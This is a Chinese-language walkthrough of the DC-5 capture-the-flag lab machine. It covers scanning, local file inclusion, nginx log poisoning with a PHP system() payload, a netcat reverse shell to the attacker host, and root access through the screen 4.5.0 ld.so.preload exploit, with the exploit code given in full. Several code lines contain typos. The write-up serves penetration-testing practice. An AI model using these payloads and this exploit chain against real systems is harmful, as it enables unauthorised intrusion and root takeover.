DC-5

#主机探测

1
2
arp-scan -l
nmap -sP 192.168.43.0/24

D主机存活

#端口扫描

1
nmap -F -sS -T4 -v 192.168.43.8

Dduank扫描80.111

#目录爆破

1
dirsearch -u http://192.168.43.8 -e php

D目录扫描

#Web界面

啥苟八拉丁语没啥用

组件:php+nginx1.6.2

读取nginx配置文件信息,发现nginx日志记录文件路径
Nginx配置文件路径: /etc/nginx/nginx.conf

Nginx日志文件所在目录:/var/log/nginx/access.log /var/log/nginx/error.log

存在文件包含漏洞

D80端口

#BP抓包-分析

1
2
3
4
5
GET /thinkyou.php?file=/etc/passwd HTTP/1.1

GET /thinkyou.php?file=<?php system($_GET['cmd']);?> HTTP/1.1

GET /thankyou.php?file=/var/log/nginx/error.log&cmd=ls

DGET

​![屏幕截图 2023-10-15 155415](assets/屏幕截图 2023-10-15 155415-20231015155420-clfsa37.png)​

Dnginx日志D

#反弹shell

1
2
3
4
5
kali:
nc -lvvp 8888

BP:
GET /thankyou.php?file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.43.33 8888

Dkalinc

​​DbpNC

#低权限交互式shell

1
python -c 'import pty;pty.spawn("/bin/bash")'

#提权

尝试SUID

suid提权:Nmap 、Vim、 find、 Bash、 More 、Less、 Nano 、cp

1
2
3
4
5
6
7
8
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}\;

存在screen 4.5.0
searchsploit screen 4.5.0

cat 41154.sh

Dscreen

#kali本地编辑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
创建libhax.c文件
#include <stdio.h>
#include <sys/types.h>
#include \<unistd.h\>
attribute ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\\n");
}

编译libhax.c文件为libhax.so

新建rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}

编译rootshell.c文件为rootshell

创建dc5.sh文件
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshel

D51154

#上传到靶机tmp下

1
2
3
4
5
6
7
8
kali:
nc -nlvp 2333 < libhax.so
nc -nlvp 2333 < rootshell
nc -nlvp 2333 < dc5.sh
目标机:
nc 192.168.43.33 2333 > libhax.so
nc 192.168.43.33 2333 > rootshell
nc 192.168.43.33 2333 > dc5.sh

D-3nc

#运行dc5.sh

1
2
3
4
cd /tmp
ls
chmod +x dc5.sh
./dc5.sh

#FLAG

1
2
whoami
cat /root/flag.txt